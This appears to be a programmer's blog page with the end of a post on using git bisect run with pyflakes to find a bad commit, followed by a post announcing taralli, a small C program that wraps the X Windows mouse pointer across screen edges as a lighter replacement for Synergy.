$ git bisect run bash -c '! pyflakes foo.py | grep mystery_variable'
running bash -c ! pyflakes foo.py | grep mystery_variable
Bisecting: 75 revisions left to test after this (roughly 6 steps)
[d3a5665eff478cccfb86d994a8fc289446325fbf] Model object components
running bash -c ! pyflakes foo.py | grep mystery_variable
Bisecting: 37 revisions left to test after this (roughly 5 steps)
[6ddcfbf27a1a4548acf972a6b817e485743f6bd9] Time-compress simulator clock
...

running bash -c ! pyflakes foo.py | grep mystery_variable
9c2b2f006207ae9f274f9182efeb3e009d18ed04 is the first bad commit
commit 9c2b2f006207ae9f274f9182efeb3e009d18ed04
Author: Ben Bitdiddle <bitdiddle@example.com>
Date:   Fri Sep 14 01:38:31 2012 -0400

    Reticulate splines

Now I can examine this commit and see what happened.

Sunday, September 9, 2012

taralli: Screen edge pointer wrapping for X

The maximum travel distance between points on a desktop is substantially reduced if the pointer is allowed to travel off a screen edge and reappear at the opposite edge. In other words, we change the topology of the desktop to be that of a torus. This is not a new idea: it's implemented in several window managers, programs for Windows and Mac OS X, and is even the subject of a research paper.

I wanted a standalone program to implement mouse pointer wrapping for X Windows on GNU/Linux. Previously I was using Synergy for this task. Synergy is a very cool program, but it's not a good choice for pointer wrapping on a single machine.

  • Correctness: I have several monitors at different resolutions, which means my desktop isn't rectangular. Synergy didn't understand where the edge of each monitor is.

  • Security: I don't need the exposure of 95,000 lines of code for this simple task. Even if there are no bugs in Synergy, I'm one configuration mistake away from running an unencrypted network keylogger.

  • Energy efficiency: Synergy wakes up 40 times per second even when nothing is happening. This can have a significant impact on laptop battery life.

So I wrote taralli as a simple replacement. It doesn't automatically understand non-rectangular desktops, but you can easily customize the pointer position mapping, to implement multi-monitor wrap-around or many other behaviors. (If someone would like to contribute the code to get multi-monitor information from Xinerama or something, I would be happy to add that.)

taralli is under 100 lines of C99. It has been tested on GNU/Linux and is likely portable to other X platforms. You can download it from GitHub, which is also a great place to submit any bug reports or patches.